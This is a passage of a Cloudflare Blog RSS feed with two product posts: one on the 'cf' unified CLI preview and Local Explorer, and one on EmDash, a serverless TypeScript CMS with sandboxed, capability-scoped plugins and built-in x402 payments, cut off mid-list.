
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:media="http://search.yahoo.com/mrss/">
    <channel>
        <title><![CDATA[ The Cloudflare Blog ]]></title>
        <description><![CDATA[ Get the latest news on how products at Cloudflare are built, technologies used, and join the teams helping to build a better Internet. ]]></description>
        <link>https://blog.cloudflare.com</link>
        <atom:link href="https://blog.cloudflare.com/" rel="self" type="application/rss+xml"/>
        <language>en-us</language>
        <image>
            <url>https://blog.cloudflare.com/favicon.png</url>
            <title>The Cloudflare Blog</title>
            <link>https://blog.cloudflare.com</link>
        </image>
        <lastBuildDate>Mon, 13 Apr 2026 18:10:22 GMT</lastBuildDate>
        <item>
            <title><![CDATA[Building a CLI for all of Cloudflare]]></title>
            <link>https://blog.cloudflare.com/cf-cli-local-explorer/</link>
            <pubDate>Mon, 13 Apr 2026 14:29:45 GMT</pubDate>
            <description><![CDATA[ We’re introducing cf, a new unified CLI designed for consistency across the Cloudflare platform, alongside Local Explorer for debugging local data. These tools simplify how developers and AI agents interact with our nearly 3,000 API operations.
 ]]></description>
            <content:encoded><![CDATA[ <p>Cloudflare has a vast API surface. We have over 100 products, and nearly 3,000 HTTP API operations.</p><p>Increasingly, agents are the primary customer of our APIs. Developers bring their coding agents to build and deploy <a href="https://workers.cloudflare.com/solutions/frontends"><u>applications</u></a>, <a href="https://workers.cloudflare.com/solutions/ai"><u>agents</u></a>, and <a href="https://workers.cloudflare.com/solutions/platforms"><u>platforms</u></a> to Cloudflare, configure their account, and query our APIs for analytics and logs.</p><p>We want to make every Cloudflare product available in all of the ways agents need. For example, we now make Cloudflare’s entire API available in a single Code Mode MCP server that uses <a href="https://blog.cloudflare.com/code-mode-mcp/"><u>less than 1,000 tokens</u></a>. There’s a lot more surface area to cover, though: <a href="https://developers.cloudflare.com/workers/wrangler/commands/"><u>CLI commands</u></a>. <a href="https://blog.cloudflare.com/workers-environment-live-object-bindings/"><u>Workers Bindings</u></a> — including APIs for local development and testing. <a href="https://developers.cloudflare.com/fundamentals/api/reference/sdks/"><u>SDKs</u></a> across multiple languages. Our <a href="https://developers.cloudflare.com/workers/wrangler/configuration/"><u>configuration file</u></a>. <a href="https://developers.cloudflare.com/terraform/"><u>Terraform</u></a>. <a href="https://developers.cloudflare.com/"><u>Developer docs</u></a>. <a href="https://developers.cloudflare.com/api/"><u>API docs</u></a> and OpenAPI schemas. <a href="https://github.com/cloudflare/skills"><u>Agent Skills</u></a>.</p><p>Today, many of our products aren’t available across every one of these interfaces. This is particularly true of our CLI — <a href="https://developers.cloudflare.com/workers/wrangler/"><u>Wrangler</u></a>. Many Cloudflare products have no CLI commands in Wrangler. 
And agents love CLIs.</p><p>So we’ve been rebuilding the Wrangler CLI to make it the CLI for all of Cloudflare. It provides commands for all Cloudflare products, and lets you configure them together using infrastructure-as-code.</p><p>Today we’re sharing a Technical Preview: an early look at what the next version of Wrangler will be. It’s very early, but we get the best feedback when we work in public.</p><p>You can try the Technical Preview today by running <code>npx cf</code>. Or you can install it globally by running <code>npm install -g cf</code>.</p><p>Right now, <code>cf</code> provides commands for just a small subset of Cloudflare products. We’re already testing a version of <code>cf</code> that supports the entirety of the Cloudflare API surface — and we will be deliberately reviewing and tuning the commands for each product so that their output is ergonomic for both agents and humans. To be clear, this Technical Preview is just a small piece of the future Wrangler CLI. Over the coming months we will bring it together with the parts of Wrangler you know and love.</p><p>To build this in a way that keeps pace with the rapid product development at Cloudflare, we had to create a new system that allows us to generate commands, configuration, binding APIs, and more.</p>
    <div>
      <h2>Rethinking schemas and our code generation pipeline from first principles</h2>
      <a href="#rethinking-schemas-and-our-code-generation-pipeline-from-first-principles">
        
      </a>
    </div>
    <p>We already generate the Cloudflare <a href="https://blog.cloudflare.com/lessons-from-building-an-automated-sdk-pipeline/"><u>API SDKs</u></a>, <a href="https://blog.cloudflare.com/automatically-generating-cloudflares-terraform-provider/"><u>Terraform provider</u></a>, and <a href="https://blog.cloudflare.com/code-mode-mcp/"><u>Code Mode MCP server</u></a> based on the OpenAPI schema for the Cloudflare API. But updating our CLI, Workers Bindings, <code>wrangler.jsonc</code> configuration, Agent Skills, dashboard, and docs is still a manual process. That process is error-prone, requires too much back and forth, and won’t scale to support the whole Cloudflare API in the next version of our CLI.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2wjmgUzBkjeI0RtyXKIMXm/f7fc6ce3b7323aacb3babdfb461f383f/BLOG-3224_2.png" />
          </figure><p>To do this, we needed more than an OpenAPI schema can express. OpenAPI schemas describe REST APIs, but we also have interactive CLI commands that combine local development with API requests, Workers bindings expressed as RPC APIs, and Agent Skills and documentation that tie it all together.</p><p>We write a lot of TypeScript at Cloudflare. It’s the lingua franca of software engineering. And we keep finding that it just works better to express APIs in TypeScript — as we do with <a href="https://blog.cloudflare.com/capnweb-javascript-rpc-library/"><u>Cap’n Web</u></a>, <a href="https://blog.cloudflare.com/code-mode/"><u>Code Mode</u></a>, and the <a href="https://developers.cloudflare.com/workers/runtime-apis/rpc/"><u>RPC system</u></a> built into the Workers platform.</p><p>So we introduced a new TypeScript schema that can define the full scope of APIs, CLI commands and arguments, and the context needed to generate any interface. The schema format is “just” a set of TypeScript types with conventions, linting, and guardrails to ensure consistency. But because it is our own format, it can easily be adapted to support any interface we need, today or in the future, while still <i>also</i> being able to generate an OpenAPI schema:</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4H0xSIPMmrixUWsFL86RUJ/998b93a465d26d856885b4d833ac19d4/BLOG-3224_3.png" />
          </figure><p>To date, most of our focus has been at this layer: building the machine we needed so that we can now start building the CLI and other interfaces we’ve wanted to provide for years. This lets us dream bigger about what we could standardize across Cloudflare and make better for agents, especially when it comes to context engineering in our CLI.</p>
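    <p>As a rough illustration of the idea, a TypeScript-first schema might look something like the sketch below. Every name in it (<code>defineResource</code>, the field names, the example operation) is hypothetical, not Cloudflare’s actual schema format:</p>

```typescript
// Hypothetical sketch of a TypeScript-first schema format. None of
// these names are Cloudflare's real schema API; they only illustrate
// how a single definition could drive OpenAPI, CLI, and docs output.
interface OperationDef {
  method: "GET" | "POST" | "PUT" | "DELETE";
  path: string;                  // REST path, used to emit OpenAPI
  cli?: { command: string };     // CLI surface, e.g. "kv namespace get"
  summary: string;               // shared by docs, --help text, and skills
}

interface ResourceDef {
  name: string;
  operations: { [name: string]: OperationDef };
}

// Identity helper; a real pipeline would validate and lint here.
function defineResource(def: ResourceDef): ResourceDef {
  return def;
}

const kvNamespace = defineResource({
  name: "kv_namespace",
  operations: {
    get: {
      method: "GET",
      path: "/accounts/{account_id}/storage/kv/namespaces/{namespace_id}",
      cli: { command: "kv namespace get" },
      summary: "Fetch a single KV namespace",
    },
  },
});
```

    <p>The point is the shape, not the names: one definition carries enough information to emit an OpenAPI path, a CLI command, and documentation together.</p>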
    <div>
      <h2>Agents and CLIs — consistency and context engineering</h2>
      <a href="#agents-and-clis-consistency-and-context-engineering">
        
      </a>
    </div>
    <p>Agents expect CLIs to be consistent. If one command uses <code>&lt;command&gt; info</code> as the syntax for getting information about a resource, and another uses <code>&lt;command&gt; get</code>, the agent will expect one and call a non-existent command for the other. In a large engineering org of hundreds or thousands of people, with many products, manually enforcing consistency through reviews is full of holes. You could enforce consistency at the CLI layer alone, but then naming would differ between the CLI, the REST API, and the SDKs, arguably making the problem worse.</p><p>One of the first things we’ve done is start creating rules and guardrails, enforced at the schema layer. It’s always <code>get</code>, never <code>info</code>. Always <code>--force</code>, never <code>--skip-confirmations</code>. Always <code>--json</code>, never <code>--format</code>, and always supported across commands.</p><p>The Wrangler CLI is also fairly unique: it provides commands and configuration that can work with both simulated local resources and remote resources, like <a href="https://developers.cloudflare.com/d1/"><u>D1 databases</u></a>, <a href="https://developers.cloudflare.com/r2"><u>R2 storage buckets</u></a>, and <a href="https://developers.cloudflare.com/kv"><u>KV namespaces</u></a>. This means consistent defaults matter even more. Suppose a developer is using remote bindings to develop locally against a remote database. If their agent thinks it’s modifying that remote database but is actually adding records to a local one, the agent won’t understand why the newly added records aren’t showing up when it makes a request to the local dev server. Consistent defaults, along with output that clearly signals whether a command applied to a remote or local resource, give agents the explicit guidance they need.</p>
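    <p>Naming rules like these lend themselves to mechanical enforcement. As a sketch (the rules come from this post; the checking code is illustrative, not Cloudflare’s actual linter):</p>

```typescript
// Hypothetical lint for CLI naming rules: every verb must come from
// a canonical allowlist, so "info" can never slip in next to "get".
const CANONICAL_VERBS = new Set(["get", "list", "create", "update", "delete"]);

// Banned names mapped to their canonical replacements.
const BANNED: { [verb: string]: string } = {
  info: "get",
  "skip-confirmations": "force",
  format: "json",
};

// Returns null when the verb is fine, or a fix-it message when not.
function lintVerb(verb: string): string | null {
  if (CANONICAL_VERBS.has(verb)) return null;
  const replacement = BANNED[verb];
  return replacement
    ? `"${verb}" is banned; use "${replacement}" instead`
    : `"${verb}" is not a canonical verb`;
}
```

    <p>Here <code>lintVerb("get")</code> returns <code>null</code>, while <code>lintVerb("info")</code> returns a message pointing at the canonical verb, so the inconsistency is caught at schema time instead of in review.</p>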
    <div>
      <h2>Local Explorer — what you can do remotely, you can now do locally</h2>
      <a href="#local-explorer-what-you-can-do-remotely-you-can-now-do-locally">
        
      </a>
    </div>
    <p>Today we are also releasing Local Explorer, a new feature available in open beta in both Wrangler and the Cloudflare Vite plugin.</p><p>Local Explorer lets you introspect the simulated resources that your Worker uses when you are developing locally, including <a href="https://www.cloudflare.com/developer-platform/products/workers-kv/"><u>KV</u></a>, <a href="https://www.cloudflare.com/developer-platform/products/r2/"><u>R2</u></a>, D1, <a href="https://www.cloudflare.com/developer-platform/products/durable-objects/"><u>Durable Objects</u></a> and <a href="https://www.cloudflare.com/developer-platform/products/workflows/"><u>Workflows</u></a>. Everything you can do with each of these via the Cloudflare API and dashboard, you can also do entirely locally, powered by the same underlying API structure.</p><p>For years we’ve <a href="https://blog.cloudflare.com/wrangler3/"><u>made a bet on fully local development</u></a> — not just for Cloudflare Workers, but for the entire platform. When you use D1, even though D1 is a hosted, serverless database product, you can run your database and communicate with it via bindings entirely locally, without any extra setup or tooling. Via <a href="https://developers.cloudflare.com/workers/testing/miniflare/"><u>Miniflare</u></a>, our local development platform emulator, the Workers runtime provides the exact same APIs in local dev as in production, and uses a local SQLite database to provide the same functionality. This makes it easy to write tests that run fast, need no network access, and work offline.</p><p>But until now, working out what data was stored locally required you to reverse-engineer the contents of the <code>.wrangler/state</code> directory or install third-party tools.</p><p>Now, whenever you run an app with the Wrangler CLI or the Cloudflare Vite plugin, you will be prompted to open Local Explorer (keyboard shortcut <code>e</code>). 
This provides a simple, local interface to see which bindings your Worker currently has attached, and what data is stored against them.</p><p>When you build using agents, Local Explorer is a great way to understand what the agent is doing with your data, making the local development cycle much more interactive. You can turn to Local Explorer anytime you need to verify a schema, seed some test records, or just start over and <code>DROP TABLE</code>.</p><p>Our goal is to provide a mirror of the Cloudflare API that only modifies local data, so that all of your local resources are available via the same APIs you use remotely. And because the API shape matches across local and remote, when you run commands in the upcoming version of the CLI and pass a <code>--local</code> flag, the commands just work. The only difference is that each command makes its request to this local mirror of the Cloudflare API instead.</p><p>Starting today, this API is available at <code>/cdn-cgi/explorer/api</code> on any application powered by Wrangler or the Vite plugin. Point your agent at this address and it will find an OpenAPI specification it can use to manage your local resources for you.</p>
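    <p>Since the mirror is served by the dev server itself, its URL is just your dev server’s origin plus that fixed path. A tiny sketch; the port is only Wrangler’s common default, and the commented-out fetch assumes nothing about the response beyond the OpenAPI spec described above:</p>

```typescript
// Build the Local Explorer API URL from a dev server origin. The
// path is the one documented in this post; the origin is whatever
// your dev server prints when it starts (8787 is a common default).
function explorerApiUrl(devOrigin: string): string {
  return new URL("/cdn-cgi/explorer/api", devOrigin).toString();
}

// Hypothetical usage, shown as a comment because the response shape
// beyond "an OpenAPI specification is discoverable here" is not
// specified in this post:
// const res = await fetch(explorerApiUrl("http://localhost:8787"));
```
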
    <div>
      <h2>Tell us your hopes and dreams for a Cloudflare-wide CLI </h2>
      <a href="#tell-us-your-hopes-and-dreams-for-a-cloudflare-wide-cli">
        
      </a>
    </div>
    <p>Now that we have built the machine, it’s time to take the best parts of Wrangler today, combine them with what’s now possible, and make Wrangler the best possible CLI for using all of Cloudflare.</p><p>You can try the Technical Preview today by running <code>npx cf</code>. Or you can install it globally by running <code>npm install -g cf</code>.</p><p>With this very early version, we want your feedback — not just about what the Technical Preview does today, but about what you want from a CLI for Cloudflare’s entire platform. Tell us what you wish were an easy one-line CLI command but takes a few clicks in our dashboard today. What you wish you could configure in <code>wrangler.jsonc</code> — like DNS records or Cache Rules. And where you’ve seen your agents get stuck, and what commands you wish our CLI provided for your agent to use.</p><p>Jump into the <a href="https://discord.cloudflare.com/"><u>Cloudflare Developers Discord</u></a> and tell us what you’d like us to add first to the CLI, and stay tuned for many more updates soon.</p><p><i>Thanks to Emily Shen for her valuable contributions to kicking off the Local Explorer project.</i></p> ]]></content:encoded>
            <category><![CDATA[Developers]]></category>
            <category><![CDATA[Developer Platform]]></category>
            <category><![CDATA[Cloudflare Workers]]></category>
            <category><![CDATA[Product News]]></category>
            <category><![CDATA[D1]]></category>
            <category><![CDATA[API]]></category>
            <category><![CDATA[Agents Week]]></category>
            <guid isPermaLink="false">5r3Nx1IDtp6B6GRDHqQyWL</guid>
            <dc:creator>Matt “TK” Taylor</dc:creator>
            <dc:creator>Dimitri Mitropoulos</dc:creator>
            <dc:creator>Dan Carter</dc:creator>
        </item>
        <item>
            <title><![CDATA[Introducing EmDash — the spiritual successor to WordPress that solves plugin security]]></title>
            <link>https://blog.cloudflare.com/emdash-wordpress/</link>
            <pubDate>Wed, 01 Apr 2026 13:00:00 GMT</pubDate>
            <description><![CDATA[ Today we are launching the beta of EmDash, a full-stack serverless JavaScript CMS built on Astro 6.0. It combines the features of a traditional CMS with modern security, running plugins in sandboxed Worker isolates. ]]></description>
            <content:encoded><![CDATA[ <p>The cost of building software has drastically decreased. We recently <a href="https://blog.cloudflare.com/vinext/"><u>rebuilt Next.js in one week</u></a> using AI coding agents. But for the past two months our agents have been working on an even more ambitious project: rebuilding the WordPress open source project from the ground up.</p><p>WordPress powers <a href="https://w3techs.com/technologies/details/cm-wordpress"><u>over 40% of the Internet</u></a>. It is a massive success that has enabled anyone to be a publisher, and created a global community of WordPress developers. But the WordPress open source project turns 23 years old this year. Hosting a website has changed dramatically during that time. When WordPress was born, AWS EC2 didn’t exist. In the intervening years, that task has gone from renting virtual private servers to uploading a JavaScript bundle to a globally distributed network at virtually no cost. It’s time to upgrade the most popular CMS on the Internet to take advantage of this change.</p><p>Our name for this new CMS is EmDash. We think of it as the spiritual successor to WordPress. It’s written entirely in TypeScript. It is serverless, but you can run it on your own hardware or any platform you choose. Plugins are securely sandboxed and can run in their own <a href="https://developers.cloudflare.com/workers/reference/how-workers-works/"><u>isolate</u></a>, via <a href="https://developers.cloudflare.com/workers/runtime-apis/bindings/worker-loader/"><u>Dynamic Workers</u></a>, solving the fundamental security problem with the WordPress plugin architecture. And under the hood, EmDash is powered by <a href="https://astro.build/"><u>Astro</u></a>, the fastest web framework for content-driven websites.</p><p>EmDash is fully open source, MIT licensed, and <a href="https://github.com/emdash-cms/emdash"><u>available on GitHub</u></a>. 
While EmDash aims to be compatible with WordPress functionality, no WordPress code was used to create EmDash. That allows us to license the open source project under the more permissive MIT license, and we hope it encourages more developers to adapt, extend, and participate in EmDash’s development.</p><p>You can deploy the EmDash v0.1.0 preview to your own Cloudflare account, or to any Node.js server, today as part of our early developer beta:</p><a href="https://deploy.workers.cloudflare.com/?url=https://github.com/emdash-cms/templates/tree/main/blog-cloudflare"><img src="https://deploy.workers.cloudflare.com/button" /></a>
<p></p><p>Or you can try out the admin interface here in the <a href="https://emdashcms.com/"><u>EmDash Playground</u></a>:</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/50n8mewREzoxOFq2jDzpT9/6a38dbfbaeec2d21040137e574a935ad/CleanShot_2026-04-01_at_07.45.29_2x.png" />
          </figure>
    <div>
      <h3>What WordPress has accomplished</h3>
      <a href="#what-wordpress-has-accomplished">
        
      </a>
    </div>
    <p>The story of WordPress is a triumph of open source that enabled publishing at a scale never before seen. Few projects have had the same recognizable impact on the generation raised on the Internet. The contributors to WordPress’s core, and its many thousands of plugin and theme developers, have built a platform that democratized publishing for millions, with many lives and livelihoods transformed by this ubiquitous software.</p><p>There will always be a place for WordPress, but there is also a lot more space for the world of content publishing to grow. A decade ago, someone picking up a keyboard to publish a blog almost universally learned WordPress. Today, that person is just as likely to pick up Astro or another TypeScript framework to learn and build with. The ecosystem needs an option that empowers a wide audience, in the same way it needed WordPress 23 years ago.</p><p>EmDash is committed to building on what WordPress created: an open source publishing stack that anyone can install and use at little cost, while fixing the core problems that WordPress cannot solve.</p>
    <div>
      <h3>Solving the WordPress plugin security crisis</h3>
      <a href="#solving-the-wordpress-plugin-security-crisis">
        
      </a>
    </div>
    <p>WordPress’s plugin architecture is fundamentally insecure. <a href="https://patchstack.com/whitepaper/state-of-wordpress-security-in-2025/"><u>96% of security issues</u></a> for WordPress sites originate in plugins. In 2025, more high-severity vulnerabilities <a href="https://patchstack.com/whitepaper/state-of-wordpress-security-in-2026/"><u>were found in the WordPress ecosystem</u></a> than in the previous two years combined.</p><p>Why, after more than two decades, is WordPress plugin security so problematic?</p><p>A WordPress plugin is a PHP script that hooks directly into WordPress to add or modify functionality. There is no isolation: a WordPress plugin has direct access to the WordPress site’s database and filesystem. When you install a WordPress plugin, you are trusting it with access to nearly everything, and trusting it to handle every malicious input or edge case perfectly.</p><p>EmDash solves this. In EmDash, each plugin runs in its own isolated sandbox: a <a href="https://developers.cloudflare.com/dynamic-workers/"><u>Dynamic Worker</u></a>. Rather than giving direct access to underlying data, EmDash provides the plugin with <a href="https://blog.cloudflare.com/workers-environment-live-object-bindings/"><u>capabilities via bindings</u></a>, based on what the plugin explicitly declares that it needs in its manifest. This security model has a strict guarantee: an EmDash plugin can only perform the actions explicitly declared in its manifest. You can know, before installing a plugin, exactly what you are granting it permission to do, similar to going through an OAuth flow and granting a third-party app a specific set of scoped permissions.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4JDq2oEgwONHL8uUJsrof2/fb2ae5fcacd5371aaab575c35ca2ce2e/image8.png" />
          </figure><p>For example, a plugin that sends an email after a content item gets saved looks like this:</p>
            <pre><code>import { definePlugin } from "emdash";

export default () =&gt;
  definePlugin({
    id: "notify-on-publish",
    version: "1.0.0",
    capabilities: ["read:content", "email:send"],
    hooks: {
      "content:afterSave": async (event, ctx) =&gt; {
        if (event.collection !== "posts" || event.content.status !== "published") return;

        await ctx.email!.send({
          to: "editors@example.com",
          subject: `New post published: ${event.content.title}`,
          text: `"${event.content.title}" is now live.`,
        });

        ctx.log.info(`Notified editors about ${event.content.id}`);
      },
    },
  });</code></pre>
            <p>This plugin explicitly requests two capabilities: <code>read:content</code>, which lets it read the content item in the lifecycle event, and <code>email:send</code>, which gives it access to the <code>ctx.email</code> function. It hooks into the content lifecycle via <code>content:afterSave</code>. It is impossible for the plugin to do anything other than use these capabilities; it has no external network access. If it does need network access, it can specify the exact hostname it needs to talk to as part of its definition, and be granted the ability to communicate with that hostname only.</p><p>Because a plugin’s needs are declared statically, up front, it is always clear at install time exactly what the plugin is asking permission to do. A platform or administrator could define rules for which plugins certain groups of users are or aren’t allowed to install, based on the permissions they request, rather than maintaining an allowlist of approved or safe plugins.</p>
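    <p>The capability model described above can be sketched in a few lines. This is an illustration of the idea, not EmDash’s actual implementation:</p>

```typescript
// Hypothetical sketch of capability-gated context building: the host
// only hands a plugin the functions its manifest declared, so an
// undeclared action is not merely rejected at runtime; the function
// simply does not exist in the plugin's context.
type Capability = "read:content" | "email:send";

interface Msg { to: string; subject: string; text: string }

function buildContext(declared: Capability[]) {
  const caps = new Set(declared);
  return {
    email: caps.has("email:send")
      ? { send: async (msg: Msg) => { /* deliver via the host mailer */ } }
      : undefined,
    content: caps.has("read:content")
      ? { get: async (id: string) => ({ id }) }
      : undefined,
  };
}
```

    <p>A plugin that declared only <code>read:content</code> receives a context where <code>email</code> is <code>undefined</code>: sending email isn’t a permission error so much as a function that was never handed over.</p>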
    <div>
      <h3>Solving plugin security means solving marketplace lock-in</h3>
      <a href="#solving-plugin-security-means-solving-marketplace-lock-in">
        
      </a>
    </div>
    <p>WordPress plugin security is such a real risk that WordPress.org <a href="https://developer.wordpress.org/plugins/wordpress-org/plugin-developer-faq/#where-do-i-submit-my-plugin"><u>manually reviews and approves each plugin</u></a> in its marketplace. At the time of writing, that review queue is over 800 plugins long and takes at least two weeks to get through. The vulnerability surface area of WordPress plugins is so wide that, in practice, all parties rely on marketplace reputation, ratings, and reviews. And because WordPress plugins run in the same execution context as WordPress itself and are so deeply intertwined with WordPress code, some argue they must carry forward WordPress’s GPL license.</p><p>These realities combine to create a chilling effect on developers building plugins, and on platforms hosting WordPress sites.</p><p>Plugin security is the root of this problem. Marketplace businesses provide trust when parties otherwise cannot easily trust each other. In the case of the WordPress marketplace, the plugin security risk is so large and so probable that many of your customers can only reasonably trust your plugin via the marketplace. But in order to be part of the marketplace, your code must be licensed in a way that forces you to give it away for free everywhere other than that marketplace. You are locked in.</p><p>EmDash plugins have two important properties that mitigate this marketplace lock-in:</p><ol><li><p><b>Plugins can have any license</b>: they run independently of EmDash and share no code. It’s the plugin author’s choice.</p></li><li><p><b>Plugin code runs independently in a secure sandbox</b>: a plugin can be provided to an EmDash site, and trusted, without the EmDash site ever seeing the code.</p></li></ol><p>The first part is straightforward — as the plugin author, you choose what license you want, the same way you can when publishing to npm, PyPI, Packagist, or any other registry. 
It’s an open ecosystem for all; the license you use for plugins and themes is up to you and the community, not the EmDash project.</p><p>The second part is where EmDash’s plugin architecture breaks free of the centralized marketplace.</p><p>Developers need to rely far less on a third-party marketplace having vetted a plugin in order to decide whether to use or trust it. Consider the example plugin above that sends emails after content is saved; the plugin declares three things:</p><ul><li><p>It only runs on the <code>content:afterSave</code> hook</p></li><li><p>It has the <code>read:content</code> capability</p></li><li><p>It has the <code>email:send</code> capability</p></li></ul><p>The plugin can contain tens of thousands of lines of code, but unlike a WordPress plugin, which has access to everything and can talk to the public Internet, the person adding it knows exactly what access they are granting. The clearly defined boundaries allow you to make informed decisions about security risks, and to zoom in on the specific risks that relate directly to the capabilities the plugin is given.</p><p>The more that sites and platforms can trust the security model to provide constraints, the more they can trust plugins, and break free of the centralized control of marketplaces and reputation. Put another way: if you trust that food safety is enforced in your city, you’ll be adventurous and try new places. If you can’t rule out a staple in your soup, you’ll be consulting Google before every new place you try, and it’s harder for everyone to open new restaurants.</p>
    <div>
      <h3>Every EmDash site has x402 support built in — charge for access to content</h3>
      <a href="#every-emdash-site-has-x402-support-built-in-charge-for-access-to-content">
        
      </a>
    </div>
    <p>The business model of the web <a href="https://blog.cloudflare.com/content-independence-day-no-ai-crawl-without-compensation/"><u>is at risk</u></a>, particularly for content creators and publishers. The old way of making content widely accessible, allowing all clients free access in exchange for traffic, breaks when there is no human looking at a site to advertise to, and the client is instead their agent accessing the web on their behalf. Creators need ways to continue to make money in this new world of agents, and to build new kinds of websites that serve what people’s agents need and will pay for. Decades ago, a new wave of creators built websites that became great businesses (often using WordPress to power them), and a similar opportunity exists today.</p><p><a href="https://www.x402.org/"><u>x402</u></a> is an open, neutral standard for Internet-native payments. It lets anyone on the Internet easily charge, and any client pay on demand, on a pay-per-use basis. A client, such as an agent, sends an HTTP request and receives an HTTP 402 Payment Required status code. In response, the client pays for access on demand, and the server lets the client through to the requested content.</p><p>EmDash has built-in support for x402. This means anyone with an EmDash site can charge for access to their content without requiring subscriptions, and with zero engineering work. All you need to do is configure which content should require payment, set how much to charge, and provide a wallet address. The request/response flow ends up looking like this:</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3IKfYGHF6Pgi3jQf1ERRQC/48815ffec3e204f4f2c6f7a40f232a93/image4.png" />
          </figure><p>Every EmDash site has a built-in business model for the AI era.</p>
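    <p>The flow can be simulated in a few lines. This sketch is only illustrative: the header name and payment proof below are placeholders, not the actual x402 wire format:</p>

```typescript
// Minimal simulation of the 402 request/response flow. A request for
// paid content without proof of payment gets 402 Payment Required;
// retrying with proof attached gets the content.
interface Req { path: string; headers: { [name: string]: string } }
interface Res { status: number; body: string }

const PAID_PATHS = new Map([["/premium-post", "0.01"]]); // price per request

function handle(req: Req): Res {
  const price = PAID_PATHS.get(req.path);
  if (price === undefined) return { status: 200, body: "free content" };
  // No proof of payment yet: respond with 402 Payment Required.
  if (!req.headers["x-payment"]) {
    return { status: 402, body: "payment of $" + price + " required" };
  }
  // A real server would verify the payment proof here.
  return { status: 200, body: "paid content" };
}

// The client pays on demand after seeing the 402, then retries:
const first = handle({ path: "/premium-post", headers: {} });
const retry = handle({ path: "/premium-post", headers: { "x-payment": "proof" } });
```

    <p>The first request gets a <code>402</code>; the retry, carrying proof of payment, gets the content. No subscription state is involved on either side.</p>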
    <div>
      <h3>Solving scale-to-zero for WordPress hosting platforms</h3>
      <a href="#solving-scale-to-zero-for-wordpress-hosting-platforms">
        
      </a>
    </div>
    <p>WordPress is not serverless: it requires provisioning and managing servers, and scaling them up and down like a traditional web application. To maximize performance and handle traffic spikes, there’s no avoiding the need to pre-provision instances and run some amount of idle compute, or to share resources in ways that limit performance. This is particularly true for sites with content that must be server-rendered and cannot be cached.</p><p>EmDash is different: it’s built to run on serverless platforms and make the most of the <a href="https://developers.cloudflare.com/workers/reference/how-workers-works/"><u>V8 isolate architecture</u></a> of Cloudflare’s open source runtime, <a href="https://github.com/cloudflare/workerd"><u>workerd</u></a>. On an incoming request, the Workers runtime instantly spins up an isolate to execute code and serve a response. It scales back down to zero if there are no requests. And it <a href="https://blog.cloudflare.com/workers-pricing-scale-to-zero/"><u>only bills for CPU time</u></a> (time spent doing actual work).</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3yIX0whveiJ7xQ9P20TeyA/84462e6ec58cab27fbd6bf1703efeabc/image7.png" />
          </figure><p>You can run EmDash anywhere, on any Node.js server — but on Cloudflare you can run millions of instances of EmDash using <a href="https://developers.cloudflare.com/cloudflare-for-platforms/"><u>Cloudflare for Platforms</u></a> that each instantly scale fully to zero or up to as many RPS as you need to handle, using the exact same network and runtime that the biggest websites in the world rely on.</p><p>Beyond cost optimizations and performance benefits, we’ve bet on this architecture at Cloudflare in part because we believe in having low cost and free tiers, and that everyone should be able to build websites that scale. We’re excited to help platforms extend the benefits of this architecture to their own customers, both big and small.</p>
    <div>
      <h3>Modern frontend theming and architecture via Astro</h3>
      <a href="#modern-frontend-theming-and-architecture-via-astro">
        
      </a>
    </div>
    <p>EmDash is powered by Astro, the web framework for content-driven websites. To create an EmDash theme, you create an Astro project that includes:</p><ul><li><p><b>Pages</b>: Astro routes for rendering content (homepage, blog posts, archives, etc.)</p></li><li><p><b>Layouts:</b> Shared HTML structure</p></li><li><p><b>Components:</b> Reusable UI elements (navigation, cards, footers)</p></li><li><p><b>Styles:</b> CSS or Tailwind configuration</p></li><li><p><b>A seed file:</b> JSON that tells the CMS what content types and fields to create</p></li></ul><p>This makes creating themes familiar to frontend developers, who are <a href="https://npm-stat.com/charts.html?package=astro&amp;from=2024-01-01&amp;to=2026-03-30"><u>increasingly choosing Astro</u></a>, and to LLMs, which are already trained on Astro.</p><p>WordPress themes, though incredibly flexible, carry many of the same security risks as plugins, and the more popular your theme, the bigger a target it is. WordPress themes integrate through <code>functions.php</code>, an all-encompassing execution environment that makes a theme both incredibly powerful and potentially dangerous. EmDash themes, like EmDash plugins, turn this expectation on its head: your theme can never perform database operations.</p>
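    <p>The seed file isn’t shown in this post, but conceptually it is JSON declaring collections and their fields. Something in this spirit, where the field names and types are guesses rather than EmDash’s documented format:</p>

```typescript
// Hypothetical theme seed: a guess at the shape of "JSON that tells
// the CMS what content types and fields to create", not EmDash's
// actual seed format.
const seed = {
  collections: [
    {
      name: "posts",
      fields: [
        { name: "title", type: "text", required: true },
        { name: "body", type: "richtext" },
        { name: "publishedAt", type: "datetime" },
      ],
    },
  ],
};
```

    <p>On first run, the CMS would read a file like this and create the matching content types, so the theme’s templates and the admin UI agree on the schema from the start.</p>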
    <div>
      <h3>An AI Native CMS — MCP, CLI, and Skills for EmDash</h3>
      <a href="#an-ai-native-cms-mcp-cli-and-skills-for-emdash">
        
      </a>
    </div>
    <p>The least fun part about working with any CMS is doing the rote migration of content: finding and replacing strings, migrating custom fields from one format to another, renaming, reordering, and moving things around. This is either boring, repetitive work or requires one-off scripts and “single-use” plugins and tools that are usually neither fun to write nor to use.</p><p>EmDash is designed to be managed programmatically by your AI agents. It provides the context and the tools that your agents need, including:</p><ol><li><p><b>Agent Skills:</b> Each EmDash instance includes <a href="https://agentskills.io/home"><u>Agent Skills</u></a> that describe to your agent the capabilities EmDash can provide to plugins, the hooks that can trigger plugins, <a href="https://github.com/emdash-cms/emdash/blob/main/skills/creating-plugins/SKILL.md"><u>guidance on how to structure a plugin</u></a>, and even <a href="https://github.com/emdash-cms/emdash/blob/main/skills/wordpress-theme-to-emdash/SKILL.md"><u>how to port legacy WordPress themes to EmDash natively</u></a>. When you give an agent an EmDash codebase, EmDash provides everything the agent needs to customize your site the way you want.</p></li><li><p><b>EmDash CLI:</b> The <a href="https://github.com/emdash-cms/emdash/blob/main/docs/src/content/docs/reference/cli.mdx"><u>EmDash CLI</u></a> enables your agent to interact programmatically with your local or remote instance of EmDash. 
